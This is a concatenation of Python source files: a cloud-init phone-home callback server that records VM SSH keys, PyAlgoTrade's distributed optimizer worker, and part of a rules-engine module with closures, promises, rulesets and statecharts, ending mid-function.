        self._ssh_keys_queue = Queue.Queue()
        self._async_hooks_thread = Thread(target=self._async_worker)
        # mangle sys.argv to pass the listen address to webpy
        new_argv = [sys.argv[0]]
        new_argv.extend(httpd_args)
        sys.argv = new_argv
        self._hooks = [self._vm_ready_hook]
        if vm_ready_hooks:
            self._hooks.extend(vm_ready_hooks)
        # defines the actual actions with VM info
        self._async_hooks = [
            self._update_ssh_known_hosts,
        ]
        # BUG FIX: async_hooks previously defaulted to a shared mutable list
        # ([]), the classic mutable-default-argument pitfall.
        if async_hooks:
            self._async_hooks.extend(async_hooks)
        self._async_hooks.append(self._report_vm_ready)
        urls = ('/', 'VMRegister')
        self._app = web.application(urls, globals())
        self._install_callback()
        self._webapp_thread = Thread(target=self._app.run)

    def _vm_ready_hook(self, **kwargs):
        # invoked by web app on POST; hand the VM info to the worker thread
        self._ssh_keys_queue.put(kwargs)

    def _update_ssh_known_hosts(self, hostname, ip, **kwargs):
        # Windows VMs are managed over winrm, not ssh.
        if kwargs.get('os', 'unix') == 'windows':
            return
        ssh_key = kwargs['ssh_key']
        update_known_hosts(ssh_key=ssh_key, ips=[(ip, hostname)])

    def _report_vm_ready(self, hostname, ip, **kwargs):
        ssh_key = kwargs['ssh_key']
        print("vm {0} ready, ssh_key: {1}".format(hostname, ssh_key))

    def _async_worker(self):
        # Consume phoned-home VMs until every awaited VM has been seen,
        # running each async hook with the reported info.
        seen_vms = set()
        vms2wait = set(name.lower() for name in self.vms2wait.keys())
        while seen_vms != vms2wait:
            vm_dat = self._ssh_keys_queue.get()
            if self._stop_event.is_set():
                break
            if vm_dat is None:
                # wake-up sentinel from stop()
                continue
            extra_args = dict((k, v) for k, v in vm_dat.items()
                              if k not in ('hostname', 'ip'))
            extra_args.update(os=guess_os(vm_dat.get('user_agent')))
            for hook in self._async_hooks:
                hook(vm_dat['hostname'], vm_dat['ip'], **extra_args)
            seen_vms.add(vm_dat['hostname'].lower())
        self._app.stop()

    def _vm_called_back(self, **kwargs):
        for f in self._hooks:
            f(**kwargs)

    def _install_callback(self):
        # web.py handlers can only reach us through web.ctx; install a
        # processor that exposes the callback as web.ctx.globals.callback.
        def _install_callback():
            g = web.storage({
                'callback': self._vm_called_back
            })

            def _wrapper(handler):
                web.ctx.globals = g
                return handler()
            return _wrapper
        self._app.add_processor(_install_callback())

    def start(self):
        self._async_hooks_thread.start()
        self._webapp_thread.start()

    def join(self):
        self._webapp_thread.join()
        self._async_hooks_thread.join()

    def stop(self):
        self._stop_event.set()
        # _async_worker can be blocked on get(), so put something to
        # the queue to wake it up
        self._ssh_keys_queue.put(None)
def run_cloudinit_callback(httpd_args, vms2wait=None, vm_ready_hook=None,
                           ssh_config=None):
    """Run the phone-home callback server until all vms2wait have reported.

    :param httpd_args: listen address argument(s) for the web server
    :param vms2wait: iterable of VM names to wait for (all get role 'all')
    :param vm_ready_hook: optional synchronous per-VM hook
    :param ssh_config: optional path of an ssh config file to maintain
    """
    vms = dict((vm, 'all') for vm in vms2wait)
    async_hooks = []
    if ssh_config:
        ssh_conf_gen = SshConfigGenerator(path=ssh_config)
        # BUG FIX: previously appended ssh_config.update — ssh_config is the
        # path string, so the generator was never used and the hook failed.
        async_hooks.append(ssh_conf_gen.update)
    server = CloudInitWebCallback(httpd_args, vms2wait=vms,
                                  async_hooks=async_hooks,
                                  vm_ready_hooks=[vm_ready_hook]
                                  if vm_ready_hook else None)
    server.start()
    server.join()
def main():
    """CLI entry point: wait for cloud-init callbacks from the listed VMs."""
    opt_parser = OptionParser()
    opt_parser.add_option(
        '-l', '--listen', dest='listen', default='0.0.0.0:8080',
        help='interface/address to listen at')
    opt_parser.add_option(
        '-s', '--ssh-config', dest='ssh_config',
        help='write ssh config file here')
    opts, positional = opt_parser.parse_args()
    # Positional arguments are the VM names to wait for.
    run_cloudinit_callback(
        [opts.listen], vms2wait=set(positional), ssh_config=opts.ssh_config)


if __name__ == '__main__':
    main()
|
worker.py | # PyAlgoTrade
#
# Copyright 2011-2018 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import socket
import multiprocessing
import retrying
from six.moves import xmlrpc_client
import pyalgotrade.logger
from pyalgotrade import barfeed
from pyalgotrade.optimizer import serialization
wait_exponential_multiplier = 500
wait_exponential_max = 10000
stop_max_delay = 10000
def any_exception(exception):
    """Retry predicate for retrying.retry: every exception is retryable."""
    del exception  # the decision does not depend on the exception type
    return True
# Retry the wrapped call with exponential backoff (500 ms multiplier, capped
# at 10 s between attempts, giving up after 10 s total); any exception
# triggers a retry via any_exception.
@retrying.retry(wait_exponential_multiplier=wait_exponential_multiplier, wait_exponential_max=wait_exponential_max, stop_max_delay=stop_max_delay, retry_on_exception=any_exception)
def retry_on_network_error(function, *args, **kwargs):
    """Invoke function(*args, **kwargs), retrying on any exception."""
    return function(*args, **kwargs)
class Worker(object):
    """XML-RPC client that pulls optimization jobs from a server, runs the
    strategy over each parameter set, and pushes the best result back.
    """

    def __init__(self, address, port, workerName=None):
        url = "http://%s:%s/PyAlgoTradeRPC" % (address, port)
        self.__logger = pyalgotrade.logger.getLogger(workerName)
        self.__server = xmlrpc_client.ServerProxy(url, allow_none=True)
        if workerName is None:
            # Default the worker name to this machine's hostname.
            self.__workerName = socket.gethostname()
        else:
            self.__workerName = workerName

    def getLogger(self):
        return self.__logger

    def getInstrumentsAndBars(self):
        ret = retry_on_network_error(self.__server.getInstrumentsAndBars)
        ret = serialization.loads(ret)
        return ret

    def getBarsFrequency(self):
        ret = retry_on_network_error(self.__server.getBarsFrequency)
        ret = int(ret)
        return ret

    def getNextJob(self):
        # Returns None when the server has no more jobs.
        ret = retry_on_network_error(self.__server.getNextJob)
        ret = serialization.loads(ret)
        return ret

    def pushJobResults(self, jobId, result, parameters):
        jobId = serialization.dumps(jobId)
        result = serialization.dumps(result)
        parameters = serialization.dumps(parameters)
        workerName = serialization.dumps(self.__workerName)
        retry_on_network_error(self.__server.pushJobResults, jobId, result, parameters, workerName)

    def __processJob(self, job, barsFreq, instruments, bars):
        # Run the strategy for every parameter set in the job, keeping the
        # best (highest) result, then report it to the server.
        bestResult = None
        parameters = job.getNextParameters()
        bestParams = parameters
        while parameters is not None:
            # Wrap the bars into a feed.
            feed = barfeed.OptimizerBarFeed(barsFreq, instruments, bars)
            # Run the strategy.
            self.getLogger().info("Running strategy with parameters %s" % (str(parameters)))
            result = None
            try:
                result = self.runStrategy(feed, *parameters)
            except Exception as e:
                self.getLogger().exception("Error running strategy with parameters %s: %s" % (str(parameters), e))
            self.getLogger().info("Result %s" % result)
            # BUG FIX: the old check `bestResult is None or result > bestResult`
            # raised TypeError on Python 3 when a failed run left result=None;
            # skip failed runs when tracking the best result.
            if result is not None and (bestResult is None or result > bestResult):
                bestResult = result
                bestParams = parameters
            # Run with the next set of parameters.
            parameters = job.getNextParameters()
        assert(bestParams is not None)
        self.pushJobResults(job.getId(), bestResult, bestParams)

    # Run the strategy and return the result.
    def runStrategy(self, feed, parameters):
        raise Exception("Not implemented")

    def run(self):
        """Main loop: fetch bars once, then process jobs until exhausted."""
        try:
            self.getLogger().info("Started running")
            # Get the instruments and bars.
            instruments, bars = self.getInstrumentsAndBars()
            barsFreq = self.getBarsFrequency()
            # Process jobs
            job = self.getNextJob()
            while job is not None:
                self.__processJob(job, barsFreq, instruments, bars)
                job = self.getNextJob()
            self.getLogger().info("Finished running")
        except Exception as e:
            self.getLogger().exception("Finished running with errors: %s" % (e))
def worker_process(strategyClass, address, port, workerName):
    """Entry point for one worker process: run strategyClass jobs until done."""

    class MyWorker(Worker):
        # Bridge the generic worker to the concrete strategy class.
        def runStrategy(self, barFeed, *args, **kwargs):
            strategy = strategyClass(barFeed, *args, **kwargs)
            strategy.run()
            return strategy.getResult()

    # Create a worker and run it.
    MyWorker(address, port, workerName).run()
def run(strategyClass, address, port, workerCount=None, workerName=None):
    """Executes one or more worker processes that will run a strategy with the bars and parameters supplied by the server.

    :param strategyClass: The strategy class.
    :param address: The address of the server.
    :type address: string.
    :param port: The port where the server is listening for incoming connections.
    :type port: int.
    :param workerCount: The number of worker processes to run. If None then as many workers as CPUs are used.
    :type workerCount: int.
    :param workerName: A name for the worker. A name that identifies the worker. If None, the hostname is used.
    :type workerName: string.
    """
    assert(workerCount is None or workerCount > 0)
    count = multiprocessing.cpu_count() if workerCount is None else workerCount
    # Build the worker processes.
    processes = [
        multiprocessing.Process(
            target=worker_process,
            args=(strategyClass, address, port, workerName))
        for _ in range(count)
    ]
    # Start them all, then wait for every one to finish.
    for proc in processes:
        proc.start()
    for proc in processes:
        proc.join()
|
engine.py | import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
    """Collects messages queued from within a rule action, to be flushed to
    another ruleset's queue after the action completes."""

    def __init__(self):
        self._queued_posts = []
        self._queued_asserts = []
        self._queued_retracts = []

    def get_queued_posts(self):
        return self._queued_posts

    def get_queued_asserts(self):
        # BUG FIX: previously returned self._queued_posts (copy-paste error),
        # so queued asserts were never visible.
        return self._queued_asserts

    def get_queued_retracts(self):
        # BUG FIX: previously returned self._queued_posts (copy-paste error).
        return self._queued_retracts

    def post(self, message):
        # Accept either a raw dict or a Content wrapper.
        if isinstance(message, Content):
            message = message._d
        self._queued_posts.append(message)

    def assert_fact(self, message):
        if isinstance(message, Content):
            message = message._d
        self._queued_asserts.append(message)

    def retract_fact(self, message):
        if isinstance(message, Content):
            message = message._d
        self._queued_retracts.append(message)
class Closure(object):
    """Execution context handed to a rule action.

    Exposes the session state (`self.s`), the triggering message(s)
    (`self._m` for a single dict, `self.m` for a list), and records the
    posts / asserts / retracts / timers / deletes requested by the action
    in per-ruleset directories so the host can flush them afterwards.
    """

    def __init__(self, host, state, message, handle, ruleset_name):
        self.ruleset_name = ruleset_name
        self.host = host
        # Session state, wrapped for attribute-style access.
        self.s = Content(state)
        self._handle = handle
        self._timer_directory = {}
        self._cancelled_timer_directory = {}
        self._message_directory = {}
        self._queue_directory = {}
        self._branch_directory = {}
        self._fact_directory = {}
        self._delete_directory = {}
        self._retract_directory = {}
        self._completed = False
        self._deleted = False
        # Start of the action lease window (see renew_action_lease).
        self._start_time = _unix_now()
        if isinstance(message, dict):
            # Single triggering message.
            self._m = message
        else:
            # Multiple triggering messages: unwrap {'m': ...} envelopes and
            # wrap each in Content.
            self.m = []
            for one_message in message:
                if ('m' in one_message) and len(one_message) == 1:
                    one_message = one_message['m']
                self.m.append(Content(one_message))

    def get_timers(self):
        return self._timer_directory

    def get_cancelled_timers(self):
        return self._cancelled_timer_directory

    def get_branches(self):
        return self._branch_directory

    def get_messages(self):
        return self._message_directory

    def get_queues(self):
        return self._queue_directory

    def get_deletes(self):
        return self._delete_directory

    def get_facts(self):
        return self._fact_directory

    def get_retract_facts(self):
        return self._retract_directory

    def get_queue(self, ruleset_name):
        # Lazily create one Closure_Queue per target ruleset.
        if not ruleset_name in self._queue_directory:
            self._queue_directory[ruleset_name] = Closure_Queue()
        return self._queue_directory[ruleset_name]

    def post(self, ruleset_name, message = None):
        # Single-argument form: post(message) targets this closure's ruleset.
        if not message:
            message = ruleset_name
            ruleset_name = self.ruleset_name
        if not 'sid' in message:
            message['sid'] = self.s.sid
        if isinstance(message, Content):
            message = message._d
        message_list = []
        if ruleset_name in self._message_directory:
            message_list = self._message_directory[ruleset_name]
        else:
            self._message_directory[ruleset_name] = message_list
        message_list.append(message)

    def delete(self, ruleset_name = None, sid = None):
        # Defaults to deleting this closure's own session.
        if not ruleset_name:
            ruleset_name = self.ruleset_name
        if not sid:
            sid = self.s.sid
        if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
            self._deleted = True
        sid_list = []
        if ruleset_name in self._delete_directory:
            sid_list = self._delete_directory[ruleset_name]
        else:
            self._delete_directory[ruleset_name] = sid_list
        sid_list.append(sid)

    def start_timer(self, timer_name, duration, manual_reset = False):
        if timer_name in self._timer_directory:
            raise Exception('Timer with name {0} already added'.format(timer_name))
        else:
            # '$t' marks the message as a timer event for this session.
            timer = {'sid': self.s.sid, '$t': timer_name}
            self._timer_directory[timer_name] = (timer, duration, manual_reset)

    def cancel_timer(self, timer_name):
        if timer_name in self._cancelled_timer_directory:
            raise Exception('Timer with name {0} already cancelled'.format(timer_name))
        else:
            self._cancelled_timer_directory[timer_name] = True

    def _retract_timer(self, timer_name, message):
        # Recursively search the (possibly nested) message for the timer
        # event and retract it; returns True if found.
        if '$t' in message and message['$t'] == timer_name:
            self.retract_fact(message)
            return True
        for property_name, property_value in message.items():
            if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
                return True
        return False

    def reset_timer(self, timer_name):
        # Retract the timer fact from whichever triggering message holds it.
        if self._m:
            return self._retract_timer(timer_name, self._m)
        else:
            for message in self.m:
                if self._retract_timer(timer_name, message):
                    return True
        return False

    def assert_fact(self, ruleset_name, fact = None):
        # Single-argument form: assert_fact(fact) targets this ruleset.
        if not fact:
            fact = ruleset_name
            ruleset_name = self.ruleset_name
        if not 'sid' in fact:
            fact['sid'] = self.s.sid
        if isinstance(fact, Content):
            # Deep-copy so later mutations of the Content don't leak in.
            fact = copy.deepcopy(fact._d)
        fact_list = []
        if ruleset_name in self._fact_directory:
            fact_list = self._fact_directory[ruleset_name]
        else:
            self._fact_directory[ruleset_name] = fact_list
        fact_list.append(fact)

    def retract_fact(self, ruleset_name, fact = None):
        if not fact:
            fact = ruleset_name
            ruleset_name = self.ruleset_name
        if not 'sid' in fact:
            fact['sid'] = self.s.sid
        if isinstance(fact, Content):
            fact = copy.deepcopy(fact._d)
        retract_list = []
        if ruleset_name in self._retract_directory:
            retract_list = self._retract_directory[ruleset_name]
        else:
            self._retract_directory[ruleset_name] = retract_list
        retract_list.append(fact)

    def renew_action_lease(self):
        # Only renew while still inside the 10-second lease window.
        if _unix_now() - self._start_time < 10:
            self._start_time = _unix_now()
            self.host.renew_action_lease(self.ruleset_name, self.s.sid)

    def _has_completed(self):
        # Treat an expired 10-second lease as completion; also marks the
        # closure completed on read, so a second call always returns True.
        if _unix_now() - self._start_time > 10:
            self._completed = True
        value = self._completed
        self._completed = True
        return value

    def _is_deleted(self):
        return self._deleted

    def __getattr__(self, name):
        # Convenience access to fields of the single triggering message;
        # missing attributes read as None.
        if name == '_m':
            return None
        if name in self._m:
            return Content(self._m[name])
        else:
            return None
class Content(object):
    """Attribute-friendly wrapper around a plain dict.

    Missing keys read as None; assigning None deletes a key; nested dicts
    are wrapped in Content on access.
    """

    def items(self):
        return self._d.items()

    def __init__(self, data):
        self._d = data

    def __getitem__(self, key):
        if key in self._d:
            data = self._d[key]
            if isinstance(data, dict):
                data = Content(data)
            return data
        else:
            return None

    def __setitem__(self, key, value):
        # BUG FIX: identity comparison (is None) instead of == None.
        if value is None:
            del self._d[key]
        elif isinstance(value, Content):
            self._d[key] = value._d
        else:
            self._d[key] = value

    def __iter__(self):
        # BUG FIX: previously returned the bound __iter__ method object
        # (not called), which made iter(content) raise TypeError.
        return iter(self._d)

    def __contains__(self, key):
        return key in self._d

    def __getattr__(self, name):
        return self.__getitem__(name)

    def __setattr__(self, name, value):
        # '_d' is the only real attribute; everything else goes to the dict.
        if name == '_d':
            self.__dict__['_d'] = value
        else:
            self.__setitem__(name, value)

    def __repr__(self):
        return repr(self._d)

    def __str__(self):
        return str(self._d)
class Promise(object):
    """One step in a chain of rule actions.

    Wraps a callable taking either (c) — synchronous — or (c, callback) —
    asynchronous. Steps are linked with continue_with(); `root` always
    points at the first promise of the chain.
    """

    def __init__(self, func):
        self._func = func
        self._next = None
        self._sync = True
        self._timer = None
        self.root = self
        # Inspect the callable's arity: 1 arg => sync, 2 args => async.
        arg_count = func.__code__.co_argcount
        if inspect.ismethod(func):
            # Discount the implicit 'self'.
            arg_count -= 1
        if arg_count == 2:
            self._sync = False
        elif arg_count != 1:
            raise Exception('Invalid function signature')

    def continue_with(self, next):
        """Append the next step (a Promise or a callable); returns it for chaining."""
        if (isinstance(next, Promise)):
            self._next = next
        elif (hasattr(next, '__call__')):
            self._next = Promise(next)
        else:
            raise Exception('Unexpected Promise Type')
        self._next.root = self.root
        return self._next

    def run(self, c, complete):
        """Execute this step with closure c; call complete(None) at chain end.

        Errors are recorded in c.s.exception rather than raised. Async steps
        may return a time budget; a 5-second repeating timer then renews the
        action lease until the budget expires.
        """
        def timeout(max_time):
            # Re-armed every 5s while an async step is still running.
            if _unix_now() > max_time:
                c.s.exception = 'timeout expired'
                complete(None)
            else:
                c.renew_action_lease()
                self._timer = threading.Timer(5, timeout, (max_time, ))
                self._timer.daemon = True
                self._timer.start()
        if self._sync:
            try:
                self._func(c)
            except BaseException as error:
                c.s.exception = 'exception caught {0}'.format(str(error))
            except:
                c.s.exception = 'unknown exception'
            if self._next:
                self._next.run(c, complete)
            else:
                complete(None)
        else:
            try:
                def callback(e):
                    # Invoked by the async step when it finishes.
                    if self._timer:
                        self._timer.cancel()
                        self._timer = None
                    if e:
                        c.s.exception = str(e)
                    if self._next:
                        self._next.run(c, complete)
                    else:
                        complete(None)
                time_left = self._func(c, callback)
                if time_left:
                    self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
                    self._timer.daemon = True
                    self._timer.start()
            except BaseException as error:
                c.s.exception = 'exception caught {0}'.format(str(error))
                complete(None)
            except:
                c.s.exception = 'unknown exception'
                complete(None)
class To(Promise):
    """Promise step that moves a statechart/flowchart session to a new state."""

    def __init__(self, from_state, to_state, assert_state):
        super(To, self).__init__(self._execute)
        self._from_state = from_state
        self._to_state = to_state
        self._assert_state = assert_state

    def _execute(self, c):
        c.s.running = True
        # Nothing to do for a self-transition.
        if self._from_state == self._to_state:
            return
        if self._from_state:
            # Retract the chart-context fact of the state being left.
            if c.m and isinstance(c.m, list):
                c.retract_fact(c.m[0].chart_context)
            else:
                c.retract_fact(c.chart_context)
        label = {'label': self._to_state, 'chart': 1}
        if self._assert_state:
            c.assert_fact(label)
        else:
            c.post(label)
class Ruleset(object):
    """Wraps a native ruleset handle and its per-rule action Promises.

    Each rule definition's 'run' entry is converted into a Promise chain:
    a string resolves through host.get_action(), a Promise is taken from
    its chain root, and a plain callable is wrapped directly.
    """

    def __init__(self, name, host, ruleset_definition, state_cache_size):
        self._actions = {}
        self._name = name
        self._host = host
        for rule_name, rule in ruleset_definition.items():
            action = rule['run']
            # 'run' is consumed here; the native layer only sees the
            # remaining (condition) part of the definition.
            del rule['run']
            if isinstance(action, str):
                self._actions[rule_name] = Promise(host.get_action(action))
            elif isinstance(action, Promise):
                self._actions[rule_name] = action.root
            elif (hasattr(action, '__call__')):
                self._actions[rule_name] = Promise(action)
        self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
        self._definition = ruleset_definition
    def bind(self, databases):
        """Bind the ruleset to one or more backing stores.

        Each entry is either a host string (defaults: port 0, db 0, no
        password) or a dict with 'host', 'port', 'db' and 'password' keys.
        """
        for db in databases:
            if isinstance(db, str):
                rules.bind_ruleset(0, 0, db, None, self._handle)
            else:
                # Fill in optional connection settings with defaults.
                if not 'password' in db:
                    db['password'] = None
                if not 'db' in db:
                    db['db'] = 0
                rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
    def get_definition(self):
        """Return the raw definition dict this ruleset was constructed from."""
        return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
    def dispatch(self, complete, async_result = None):
        """Pop the next pending action for this ruleset and execute it.

        complete(error, wait): wait=True asks the caller to back off before
        polling again. async_result, when provided, is a tuple of
        (state, message_json, action_handle, action_binding) carried over
        from a prior rules.complete_and_start_action call, so the engine is
        not polled again.
        """
        state = None
        action_handle = None
        action_binding = None
        result_container = {}
        if async_result:
            state = async_result[0]
            result_container = {'message': json.loads(async_result[1])}
            action_handle = async_result[2]
            action_binding = async_result[3]
        else:
            try:
                result = rules.start_action(self._handle)
                if not result:
                    # Nothing pending: tell the caller it can wait.
                    complete(None, True)
                    return
                else:
                    state = json.loads(result[0])
                    result_container = {'message': json.loads(result[1])}
                    action_handle = result[2]
                    action_binding = result[3]
            except BaseException as error:
                t, v, tb = sys.exc_info()
                print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
                complete(error, True)
                return
            except:
                t, v, tb = sys.exc_info()
                print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
                complete('unknown error', True)
                return
        while 'message' in result_container:
            action_name = None
            # The engine returns a single {action_name: message} pair; grab it.
            for action_name, message in result_container['message'].items():
                break
            del(result_container['message'])
            c = Closure(self._host, state, message, action_handle, self._name)
            def action_callback(e):
                # Invoked when the user action finishes: flush all queued
                # side effects, then complete the action (possibly chaining
                # straight into the next pending action for this session).
                if c._has_completed():
                    return
                if e:
                    rules.abandon_action(self._handle, c._handle)
                    complete(e, True)
                else:
                    try:
                        for timer_name, timer in c.get_cancelled_timers().items():
                            self.cancel_timer(c.s['sid'], timer_name)
                        for timer_id, timer_tuple in c.get_timers().items():
                            self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
                        for ruleset_name, q in c.get_queues().items():
                            for message in q.get_queued_posts():
                                self.queue_assert_event(message['sid'], ruleset_name, message)
                            for message in q.get_queued_asserts():
                                self.queue_assert_fact(message['sid'], ruleset_name, message)
                            for message in q.get_queued_retracts():
                                self.queue_retract_fact(message['sid'], ruleset_name, message)
                        for ruleset_name, sid in c.get_deletes().items():
                            self._host.delete_state(ruleset_name, sid)
                        binding = 0
                        replies = 0
                        # pending maps engine binding -> outstanding reply count,
                        # so each binding is completed exactly once below.
                        pending = {action_binding: 0}
                        for ruleset_name, facts in c.get_retract_facts().items():
                            if len(facts) == 1:
                                binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
                            else:
                                binding, replies = self._host.start_retract_facts(ruleset_name, facts)
                            if binding in pending:
                                pending[binding] = pending[binding] + replies
                            else:
                                pending[binding] = replies
                        for ruleset_name, facts in c.get_facts().items():
                            if len(facts) == 1:
                                binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
                            else:
                                binding, replies = self._host.start_assert_facts(ruleset_name, facts)
                            if binding in pending:
                                pending[binding] = pending[binding] + replies
                            else:
                                pending[binding] = replies
                        for ruleset_name, messages in c.get_messages().items():
                            if len(messages) == 1:
                                binding, replies = self._host.start_post(ruleset_name, messages[0])
                            else:
                                binding, replies = self._host.start_post_batch(ruleset_name, messages)
                            if binding in pending:
                                pending[binding] = pending[binding] + replies
                            else:
                                pending[binding] = replies
                        binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
                        if binding in pending:
                            pending[binding] = pending[binding] + replies
                        else:
                            pending[binding] = replies
                        for binding, replies in pending.items():
                            if binding != 0:
                                if binding != action_binding:
                                    rules.complete(binding, replies)
                                else:
                                    # Completing the action's own binding may hand
                                    # back the next action for the same session.
                                    new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
                                    if new_result:
                                        if 'async' in result_container:
                                            # Already running asynchronously: recurse
                                            # with the carried-over result instead of
                                            # re-entering the while loop.
                                            def terminal(e, wait):
                                                return
                                            self.dispatch(terminal, [state, new_result, action_handle, action_binding])
                                        else:
                                            result_container['message'] = json.loads(new_result)
                    except BaseException as error:
                        t, v, tb = sys.exc_info()
                        print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
                        rules.abandon_action(self._handle, c._handle)
                        complete(error, True)
                    except:
                        print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
                        rules.abandon_action(self._handle, c._handle)
                        complete('unknown error', True)
                if c._is_deleted():
                    try:
                        self.delete_state(c.s.sid)
                    except BaseException as error:
                        complete(error, True)
                if 'async' in result_container:
                    del result_container['async']
            self._actions[action_name].run(c, action_callback)
            result_container['async'] = True
        complete(None, False)
class Statechart(Ruleset):
    """A Ruleset whose rules are compiled from a statechart definition.

    Each state's triggers become rules guarded by a 'chart_context' test on
    the current state label; 'to' transitions are implemented by chaining a
    To(...) continuation that moves the chart to the destination state.
    """
    def __init__(self, name, host, chart_definition, state_cache_size):
        self._name = name
        self._host = host
        ruleset_definition = {}
        # Compile the chart into a flat ruleset before initializing the base.
        self._transform(None, None, None, chart_definition, ruleset_definition)
        super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
        self._definition = chart_definition
        self._definition['$type'] = 'stateChart'
    def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
        """Recursively translate chart states/triggers into rules.

        parent_name qualifies nested state names; parent_triggers are
        inherited by substates; parent_start_state tracks candidate start
        states of the enclosing chart. Raises if a trigger's destination is
        undefined, or if the chart has zero or multiple start states.
        """
        start_state = {}
        reflexive_states = {}
        # First pass: every state is a start-state candidate; states with a
        # self-transition (or count/cap semantics) must re-assert their state.
        for state_name, state in chart_definition.items():
            qualified_name = state_name
            if parent_name:
                qualified_name = '{0}.{1}'.format(parent_name, state_name)
            start_state[qualified_name] = True
            for trigger_name, trigger in state.items():
                if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
                    reflexive_states[qualified_name] = True
        # Second pass: emit one rule per trigger.
        for state_name, state in chart_definition.items():
            qualified_name = state_name
            if parent_name:
                qualified_name = '{0}.{1}'.format(parent_name, state_name)
            triggers = {}
            if parent_triggers:
                for parent_trigger_name, trigger in parent_triggers.items():
                    triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
            for trigger_name, trigger in state.items():
                if trigger_name != '$chart':
                    if ('to' in trigger) and parent_name:
                        trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
                    triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
            if '$chart' in state:
                # Nested chart: recurse, substates inherit this state's triggers.
                self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
            else:
                for trigger_name, trigger in triggers.items():
                    rule = {}
